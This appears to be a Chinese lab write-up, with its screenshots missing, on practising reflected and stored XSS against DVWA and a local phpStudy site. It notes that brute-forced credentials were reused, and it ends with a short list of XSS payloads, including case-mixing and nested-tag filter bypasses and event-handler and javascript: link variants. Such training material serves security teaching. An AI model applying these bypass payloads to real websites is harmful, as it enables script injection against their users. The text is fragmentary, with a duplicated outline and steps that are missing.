目錄

小皮:

1.

2.這里需要登錄,我們之前爆破出賬號密碼在這里就可以用?編輯

登錄之后:?編輯

使用工具:

先輸入正確字符進行測試:aaa

進行測試:

3.換種控制臺顯示

結果:(使用f12大法)

?DVWA:

反射型XSS:

低:

?編輯

中:大小寫繞過:

?編輯

也可以雙寫繞過:

?編輯

高:

?編輯

存儲型XSS:

低:

中:

?編輯

高:

---

小皮:

1.

2.這里需要登錄,我們之前爆破出賬號密碼在這里就可以用

登錄之后:

使用工具:

先輸入正確字符進行測試:aaa

進行測試:

3.換種控制臺顯示

結果:(使用f12大法)

?DVWA:

反射型XSS:

低:

中:大小寫繞過:

也可以雙寫繞過:

高:

存儲型XSS:

低:

上下均可執行,name需要修改前端代碼

a標簽也可以

中:

這里可以測試出name是存在xss的,message沒有

高:

結果大家可以自己動手操作一下

彩蛋:

<script>alert(1);</script>
<s<script>cript>alert(1);</script>
<Sc<ScRipt>Ript>alert(1);</script>
<script>console.log('123');</script>
<body onload=alert(1)>
<a href="javascript:alert(1)">test</a>